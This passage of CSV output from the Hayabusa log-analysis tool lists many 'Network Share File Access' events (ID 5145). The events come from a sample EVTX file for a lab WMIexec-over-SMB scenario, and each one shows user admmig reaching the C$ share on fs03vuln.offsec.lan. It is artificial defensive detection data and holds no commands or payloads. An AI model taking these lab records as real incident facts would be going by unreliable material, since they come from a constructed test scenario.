10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 